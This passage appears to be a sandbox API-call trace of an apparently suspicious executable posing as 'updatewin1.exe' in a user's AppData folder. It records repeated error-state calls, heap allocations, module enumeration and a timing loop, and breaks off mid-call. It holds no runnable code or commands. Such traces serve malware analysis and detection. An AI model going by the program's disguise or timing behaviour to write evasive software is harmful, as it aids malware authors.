!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿD)¯\x80\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.766] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe")) returned 0x5f [0130.766] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.767] SetLastError (dwErrCode=0x0) [0130.767] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.768] SetLastError (dwErrCode=0x0) [0130.768] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.769] SetLastError (dwErrCode=0x0) [0130.769] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.770] SetLastError (dwErrCode=0x0) [0130.770] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.771] SetLastError (dwErrCode=0x0) [0130.771] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.772] SetLastError (dwErrCode=0x0) [0130.772] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.773] SetLastError (dwErrCode=0x0) [0130.773] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.774] GetLastError () returned 0x0 [0130.774] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.775] SetLastError (dwErrCode=0x0) [0130.775] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x74) returned 0x591990 [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.776] SetLastError (dwErrCode=0x0) [0130.776] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.777] GetLastError () returned 0x0 [0130.777] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.778] GetLastError () returned 0x0 [0130.778] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.779] GetLastError () returned 0x0 [0130.779] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.780] GetLastError () returned 0x0 [0130.780] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.781] SetLastError (dwErrCode=0x0) [0130.781] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.782] GetLastError () returned 0x0 [0130.782] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.783] SetLastError (dwErrCode=0x0) [0130.783] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.784] SetLastError (dwErrCode=0x0) [0130.784] GetLastError () returned 0x0 [0130.785] SetLastError (dwErrCode=0x0) [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x98) returned 0x591a10 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1f) returned 0x591ab0 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x591ad8 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x37) returned 0x591b18 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x591b58 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x591ba0 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x591be0 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x591c00 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x591c30 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd) returned 0x591c50 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x25) returned 0x591c68 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x39) returned 0x591c98 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x591ce0 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x591d00 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x591d20 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x69) returned 0x591d38 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x591db0 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b) returned 0x591df8 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1d) returned 0x591e20 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x591e48 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x591e98 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x591eb8 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b) returned 0x591ed8 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x591f00 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x591f30 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x591f68 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x41) returned 0x591f90 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x591fe8 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf) returned 0x592008 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x16) returned 0x592020 [0130.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x592040 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x592078 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x15) returned 0x5920b0 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x5920d0 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x5920f8 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x592130 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x592150 [0130.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x46) returned 0x592170 [0130.786] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911f8 | out: hHeap=0x590000) returned 1 [0130.787] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5921c0 [0130.787] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x80) returned 0x5911f8 [0130.787] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0130.787] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5911f8) returned 0x80 [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.788] SetLastError (dwErrCode=0x0) [0130.788] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.789] SetLastError (dwErrCode=0x0) [0130.789] GetLastError () returned 0x0 [0130.790] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0130.790] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0130.790] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0130.790] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0130.792] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0130.792] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0130.792] GetTickCount () returned 0x1153e68 [0130.792] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.792] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.792] GetACP () returned 0x4e4 [0130.792] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.812] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.812] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.812] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.812] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.812] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.812] GetACP () returned 0x4e4 [0130.812] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, 